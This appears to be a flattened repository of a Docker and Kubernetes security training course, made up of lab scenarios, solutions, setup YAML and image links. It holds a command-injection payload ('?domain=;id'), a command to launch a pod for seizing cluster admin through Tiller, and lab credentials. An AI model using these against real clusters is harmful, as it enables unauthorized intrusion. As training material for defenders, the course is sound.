this docker image by doing analysis 4 | 5 | ```bash 6 | custom-htop 7 | ``` 8 | 9 | > Do this in the `student-vm` -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/images/docker-volume-inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-volumes-and-networks/images/docker-volume-inspect.png -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/images/docker-volumes-data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-volumes-and-networks/images/docker-volumes-data.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-architecture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-architecture.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-inspect-nginx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-inspect-nginx.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-search-wpscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-search-wpscan.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/nginxalpine-container.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/nginxalpine-container.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/start-nc-listener.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/start-nc-listener.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/capabilities-ping-drop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/capabilities-ping-drop.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/docker-client-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/docker-client-file.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/nc-student-listen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/nc-student-listen.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-apparmor-profile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-apparmor-profile.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/access-docker-swarm-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/access-docker-swarm-app.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/access-docker-swarm-env.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/access-docker-swarm-env.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-interactive-bash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-interactive-bash.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-stop-and-remove.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-stop-and-remove.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/privileged-container-kmsg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/privileged-container-kmsg.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/images/misconfig-nmap-scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-misconfiguration/images/misconfig-nmap-scan.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-image-packages-query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-image-packages-query.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-inspect-for-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-inspect-for-socket.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-run-welcome-ubuntu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-run-welcome-ubuntu.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-container-namespaces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-container-namespaces.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/images/docker-tcp-host-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-misconfiguration/images/docker-tcp-host-access.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/images/misconfig-curl-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-misconfiguration/images/misconfig-curl-images.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-exploit.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-node-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-node-app.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-volume-sensitive-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-volume-sensitive-info.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/docker-swarm-search-locations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/docker-swarm-search-locations.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-analysis-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-analysis-secrets.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-registry-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-registry-access.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/download-image-locally.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/download-image-locally.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-access-host-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-access-host-flag.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-download-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-download-payload.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-msfvenom-generate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-msfvenom-generate.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-payload-execution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-payload-execution.png -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/images/docker-secrets-default-location.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/exploiting-cluster-secrets/images/docker-secrets-default-location.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-start-python-server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-start-python-server.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mont-reverse-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mont-reverse-shell.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-docker-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-docker-socket.png -------------------------------------------------------------------------------- /infra-setup/README.md: -------------------------------------------------------------------------------- 1 | # Infrastructure Setup 2 | 3 | ## Requirements 4 | 5 | * Kubernetes Cluster 6 | * `kubectl` configured to use cluster 7 | * Helm v2 8 | 9 | ## Deploy Lab Environment 10 | 11 | ``` 12 | cd infra-setup 13 | ./setup.sh 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-registry-access-image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-registry-access-image.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-system-info-registries.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-system-info-registries.png -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/images/docker-registry-config-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-auditing-docker-registry/images/docker-registry-config-secrets.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/accessing-host-system-using-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/accessing-host-system-using-socket.png -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/images/insecure-mount-vulnerable-parameter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-insecure-volume-mounts/images/insecure-mount-vulnerable-parameter.png -------------------------------------------------------------------------------- /gitbook/environment-setup/common-troublehshooting-steps.md: -------------------------------------------------------------------------------- 1 | # Common Troubleshooting Steps 2 | 3 | * If you encounter `REMOTE HOST IDENTIFICATION CHANGED` error. Please remove the conflicting entry by running the command printed 4 | 5 | ![ssh host key error](images/ssh-host-key-error.png) -------------------------------------------------------------------------------- /gitbook/docker-image-audit/solution.md: -------------------------------------------------------------------------------- 1 | # docker image analysis - Solution 2 | 3 | * Run the below command to show the history of a docker image. This will list the commands that were used for creating the image 4 | 5 | ```bash 6 | docker history custom-htop 7 | ``` 8 | 9 | ![docker history](images/docker-history.png) -------------------------------------------------------------------------------- /gitbook/kubernetes-101/children-guide.md: -------------------------------------------------------------------------------- 1 | # The Illustrated Children's Guide to Kubernetes 2 | 3 | [![The Illustrated Children's Guide to Kubernetes](https://img.youtube.com/vi/4ht22ReBjno/0.jpg)](https://www.youtube.com/watch?v=4ht22ReBjno) 4 | 5 | source: [https://www.youtube.com/watch?v=4ht22ReBjno](https://www.youtube.com/watch?v=4ht22ReBjno) 6 | -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/scenario.md: -------------------------------------------------------------------------------- 1 | # Exploiting Cluster Secrets 2 | 3 | In this scenario we will see how we will exploit an application to access docker swarm cluster secrets. 4 | 5 | * The application running in the CTF VM has code execution vulnerability `http://CTFVMIP:8080/?domain=;id` and is running in docker swarm with secrets attached -------------------------------------------------------------------------------- /gitbook/automated-defense-for-container-security/demo.md: -------------------------------------------------------------------------------- 1 | # Automated Defense for Container Security - DEMO 2 | 3 | In this scenario we will see how we can detect a sensitive file read operation occurring inside a container in a Kubernetes cluster. 4 | 5 | We will see how to apply automated defense to automatically stop the attack and apply the fix in near-realtime. 6 | 7 | 8 | 9 | ## DEMO -------------------------------------------------------------------------------- /gitbook/popular-attacks/metadata.md: -------------------------------------------------------------------------------- 1 | # Shopify metadata to cluster pwn 2 | 3 | The application vulnerability Server-Side Request Forgery (SSRF) in one of the container running in Kubernetes cluster allows attacker to access and gain control over the entire shopify cluster and instances. 4 | 5 | * Read more about [SSRF to ROOT access in all instances](https://hackerone.com/reports/341876) 6 | -------------------------------------------------------------------------------- /gitbook/extra/katacoda.md: -------------------------------------------------------------------------------- 1 | # Katacoda Docker Security 2 | 3 | Learn Docker Security using Interactive Browser-Based Scenarios. Solve real problems and enhance your skills with browser based hands on labs without any downloads or configuration 4 | 5 | ![Katacoda Docker Security](images/katacoda.png) 6 | 7 | ### References 8 | 9 | * [https://www.katacoda.com/courses/docker-security](https://www.katacoda.com/courses/docker-security) -------------------------------------------------------------------------------- /gitbook/popular-attacks/dockerhub-190k.md: -------------------------------------------------------------------------------- 1 | # Dockerhub 190k accounts hacked 2 | 3 | Docker Hub has been compromised very recently and this attack has put almost 190K users at risk. More details pointing to discussion at [Hacker News](https://news.ycombinator.com/item?id=19763413) 4 | 5 | 6 | * [Some tips to review Docker Hub Hack of 190k accounts](https://blog.madhuakula.com/some-tips-to-review-docker-hub-hack-of-190k-accounts-addcd602aade) -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Private Registry - Scenario 2 | 3 | Organization hosting their infrastructure in containers with help of orchestration and clustering. Organization uses automated deployments using continuous integration and continuous delivery. All the containers will be stored in centralized private registry. Identify the sensitive information from the registry. 4 | 5 | ### Target 6 | 7 | 165.22.221.65 8 | -------------------------------------------------------------------------------- /gitbook/getting-started/configure-kubectl.md: -------------------------------------------------------------------------------- 1 | # Configure the `kubectl` 2 | 3 | * Start Kubernetes student VM 4 | * Copy your configuration file `k8s-training-kubeconfig` to `/home/student/.kube/config` 5 | * The file `k8s-training-kubeconfig` is generated by `setup.sh` script as part of cluster creation 6 | * Run the below command to confirm that everything works fine 7 | 8 | ```bash 9 | kubectl get pods 10 | ``` 11 | 12 | ![](images/kubectl-get-pods.png) 13 | -------------------------------------------------------------------------------- /infra-setup/helm-rbac/helm-rbac.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: tiller 5 | namespace: kube-system 6 | --- 7 | apiVersion: rbac.authorization.k8s.io/v1 8 | kind: ClusterRoleBinding 9 | metadata: 10 | name: tiller 11 | roleRef: 12 | apiGroup: rbac.authorization.k8s.io 13 | kind: ClusterRole 14 | name: cluster-admin 15 | subjects: 16 | - kind: ServiceAccount 17 | name: tiller 18 | namespace: kube-system 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *~ 18 | # Various IDEs 19 | .project 20 | .idea/ 21 | *.tmproj 22 | .vscode/ 23 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *~ 18 | # Various IDEs 19 | .project 20 | .idea/ 21 | *.tmproj 22 | .vscode/ 23 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *~ 18 | # Various IDEs 19 | .project 20 | .idea/ 21 | *.tmproj 22 | .vscode/ 23 | -------------------------------------------------------------------------------- /gitbook/intro/disclaimer.md: -------------------------------------------------------------------------------- 1 | # Disclaimer 2 | 3 | - The attacks covered in the training are for educational purposes only. Do not test or attack any system outside of the scope of this training lab unless you have express permission to do so 4 | - The snippets, commands and scripts used throughout the training are not production-ready, may not be bug-free and are not guaranteed in any way 5 | 6 | ![5 year jail term for hacking unauthorized computers and networks according to the Indian IT Act 2000](images/warning.png) 7 | -------------------------------------------------------------------------------- /gitbook/extra/contianed-af.md: -------------------------------------------------------------------------------- 1 | # Contained.af 2 | 3 | > Game for learning about containers, capabilities, and syscalls by [@jessfraz](https://github.com/jessfraz) 4 | 5 | There is a CTF on every VM instance. If you manage to break out of the container, email `not.quite@contained.af` and you will be rewarded. If you bother this email address with anything that is not the ascii art contents of the flag file you will be ignored. 6 | 7 | ![Contained.af Game](images/contained-af.png) 8 | 9 | * Play the game at [https://contained.af](https://contained.af/) -------------------------------------------------------------------------------- /gitbook/popular-attacks/service-token.md: -------------------------------------------------------------------------------- 1 | # BSidesSF CTF cluster pwn 2 | 3 | The challenges for the BsidesSF CTF were run in Docker containers on Kubernetes using Google Container Engine. Because of the two infrastructure issues, it was possible to exploit one of the early challenges, steal service account keys, and then use those keys to directly access flags. 4 | 5 | * Read more about [Capturing all the flags in BSidesSF CTF by pwning our infrastructure](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Container Capabilities - Scenario 2 | 3 | In this scenario we will exploit a container with `sys_ptrace` capability running with host `PID` namespace. We will exploit these to breakout of the container and access the host system. We assume that the attacker already has access to the container for this scenario. 4 | 5 | * Login to the container using below command. Ensure that you run this in the `CTF` vm 6 | 7 | ```bash 8 | docker exec -it sysmon bash 9 | ``` 10 | 11 | ![docker exec into sysmon](images/sysmon-access.png) -------------------------------------------------------------------------------- /gitbook/logging-and-monitoring/readme.md: -------------------------------------------------------------------------------- 1 | # Logging and Monitoring for Kubernetes 2 | 3 | We can get more detailed information about kubernetes and it's resources using built-in commands 4 | 5 | * Looking for more information about pods 6 | 7 | ```bash 8 | kubectl describe pod 9 | ``` 10 | 11 | * Looking for logs of pods 12 | 13 | ```bash 14 | kubectl logs -f 15 | ``` 16 | 17 | * Looking complete information about cluster (to debug and diagnose cluster problems) 18 | 19 | ```bash 20 | kubectl cluster-info dump 21 | ``` 22 | 23 | * Stack driver logging 24 | 25 | ![](images/stack-driver.png) -------------------------------------------------------------------------------- /gitbook/environment-setup/ssh-into-machine.md: -------------------------------------------------------------------------------- 1 | # SSH into machines 2 | 3 | ## SSH into the student machine 4 | 5 | * Run the following command from your terminal. Make sure you replace the `CTFVMIP` ip address with your student vm ip address 6 | 7 | ```bash 8 | ssh student@STUDENTVMIP 9 | ``` 10 | 11 | ![ssh into student vm](images/student-ssh.png) 12 | 13 | 14 | ## SSH into the ctf machine 15 | 16 | * Run the following command from your terminal. Make sure you replace the `CTFVMIP` ip address with your ctf vm ip address 17 | 18 | ```bash 19 | ssh ctf@CTFVMIP 20 | ``` 21 | 22 | ![ssh into ctf vm](images/ctf-ssh.png) 23 | -------------------------------------------------------------------------------- /gitbook/getting-started/import-vm.md: -------------------------------------------------------------------------------- 1 | # Download Kubernetes Student VM 2 | 3 | * http://www.mediafire.com/file/b739545szyrc6i5/kubernetes-security.ova/file 4 | * http://www.mediafire.com/file/asz5xukxg1lhs3r/kubernetes-security.ova.checksum/file 5 | 6 | # Import VM 7 | 8 | * Click on Virtual Box `File` -> `Import` 9 | 10 | * Browse to the ova of k8s-security and import the file 11 | ![](images/select-import.png) 12 | 13 | * Click on Import 14 | ![](images/import.png) 15 | 16 | ![](images/process.png) 17 | 18 | 19 | * Login to the vm using below credentials 20 | 21 | ```bash 22 | username: student 23 | password: hackk8s 24 | ``` -------------------------------------------------------------------------------- /gitbook/automated-defense/readme.md: -------------------------------------------------------------------------------- 1 | # Security checks for events using Sysdig Falco (DEMO Only) 2 | 3 | In this scenario we will see how we can detect a sensitive file read operation occurring inside a container in a Kubernetes cluster. 4 | 5 | We will see how to apply automated defense to automatically stop the attack and apply the fix in near-realtime. 6 | 7 | ## DEMO 8 | 9 | [![Container Security Monitoring - Automated Defense](https://img.youtube.com/vi/zd0ksjZI5Vk/0.jpg)](https://www.youtube.com/watch?v=zd0ksjZI5Vk) 10 | 11 | source: [https://www.youtube.com/watch?v=zd0ksjZI5Vk](https://www.youtube.com/watch?v=zd0ksjZI5Vk) 12 | -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/solution.md: -------------------------------------------------------------------------------- 1 | # Docker Volumes - Solution 2 | 3 | * Inspecting docker volumes 4 | 5 | ```bash 6 | docker volume inspect 1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67 7 | ``` 8 | 9 | ![docker volume inspect](images/docker-volume-inspect.png) 10 | 11 | * Looking for sensitive data and secrets 12 | 13 | ```bash 14 | sudo -i 15 | cd /var/lib/docker/volumes/1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67/_data 16 | ls 17 | grep -i 'flag' wp-config.php 18 | grep -i 'password' wp-config.php 19 | ``` 20 | 21 | ![looking for data in volumes](images/docker-volumes-data.png) 22 | -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/README.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Containers 2 | 3 | Auditing `docker` containerised environment from a security perspective involves identifying security misconfigurations while deploying and running docker containers. Auditing docker containers and its runtime environment requires inspecting the following components. 4 | 5 | * Docker images 6 | * Docker containers 7 | * Docker networks 8 | * Docker registries 9 | * Docker volumes 10 | * Docker runtime 11 | 12 | In this section we will explore tools and techniques that allows an auditor to effectively perform a security audit of docker based containerised environment. -------------------------------------------------------------------------------- /infra-setup/net-tools/net-tools.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: net-tools-deployment 5 | labels: 6 | app: net-tools 7 | spec: 8 | replicas: 1 9 | selector: 10 | matchLabels: 11 | app: net-tools 12 | template: 13 | metadata: 14 | labels: 15 | app: net-tools 16 | spec: 17 | containers: 18 | - name: net-tools 19 | image: appsecco/k8s-training-netscan-tools:latest 20 | resources: 21 | limits: 22 | cpu: 50m 23 | memory: 100Mi 24 | requests: 25 | cpu: 40m 26 | memory: 80Mi 27 | -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/scenario.md: -------------------------------------------------------------------------------- 1 | # Exploiting docker misconfiguration - Scenario 2 | 3 | In this scenario we will see a misconfigured `docker` instance with exposed TCP ports on the network. We will use this with docker runtime option to access the containers, images and gain host system privileges. 4 | 5 | > The Docker daemon can listen for Docker Engine API requests via three different types of Socket `unix`, `tcp`, and `fd`. To access remotely we have to enable `tcp` socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. 6 | 7 | 8 | * Your weapon to attack this scenario is the popular `nmap` tool -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-volumes-and-networks.md: -------------------------------------------------------------------------------- 1 | # Docker volumes and networks 2 | 3 | ## Checking for the docker volumes 4 | 5 | * Listing the docker volumes 6 | 7 | ```bash 8 | docker volume ls 9 | ``` 10 | 11 | ![docker volumes](images/docker-volumes.png) 12 | 13 | 14 | * Creating new docker volume 15 | 16 | ```bash 17 | docker volume create c0c0n 18 | ``` 19 | 20 | ## Checking for the docker networks 21 | 22 | * Listing the docker networks 23 | 24 | ```bash 25 | docker network ls 26 | ``` 27 | 28 | ![docker networks](images/docker-networks.png) 29 | 30 | 31 | * Creating new docker network 32 | 33 | ```bash 34 | docker network create c0c0n 35 | ``` -------------------------------------------------------------------------------- /gitbook/extra/play-with-docker.md: -------------------------------------------------------------------------------- 1 | # Play with Docker 2 | 3 | The Play with Docker classroom brings you labs and tutorials that help you get hands-on experience using Docker. In this classroom you will find a mix of labs and tutorials that will help Docker users, including SysAdmins, IT Pros, and Developers. There is a mix of hands-on tutorials right in the browser, instructions on setting up and using Docker in your own environment, and resources about best practices for developing and deploying your own applications. 4 | 5 | ![Play with Docker](images/play-with-docker.png) 6 | 7 | ### References 8 | 9 | * [https://training.play-with-docker.com](https://training.play-with-docker.com/) -------------------------------------------------------------------------------- /gitbook/scenario-6/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Helm tiller without RBAC setup - Scenario 2 | 3 | Bob has managed to gain access to a pod inside a K8S cluster. Bob knows that the default Kubernetes cluster deployments have very poor Role Based Access Control mechanisms. 4 | 5 | Bob knows that he should be able to get the Kubernetes cluster admin access by using Helm and the Tiller service. 6 | 7 | Let's help Bob get the cluster admin access out of this cluster! 8 | 9 | ## Tips 10 | 11 | * You can run the below command to get shell with enough tools to get cluster admin access 12 | 13 | ```bash 14 | kubectl run -n default --quiet --rm --restart=Never -ti --image=madhuakula/helm-security incluster 15 | ``` -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/tests/test-connection.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: "{{ include "server-health.fullname" . }}-test-connection" 5 | labels: 6 | app.kubernetes.io/name: {{ include "server-health.name" . }} 7 | helm.sh/chart: {{ include "server-health.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | annotations: 11 | "helm.sh/hook": test-success 12 | spec: 13 | containers: 14 | - name: wget 15 | image: busybox 16 | command: ['wget'] 17 | args: ['{{ include "server-health.fullname" . }}:{{ .Values.service.port }}'] 18 | restartPolicy: Never 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/tests/test-connection.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: "{{ include "mailbox-service.fullname" . }}-test-connection" 5 | labels: 6 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 7 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | annotations: 11 | "helm.sh/hook": test-success 12 | spec: 13 | containers: 14 | - name: wget 15 | image: busybox 16 | command: ['wget'] 17 | args: ['{{ include "mailbox-service.fullname" . }}:{{ 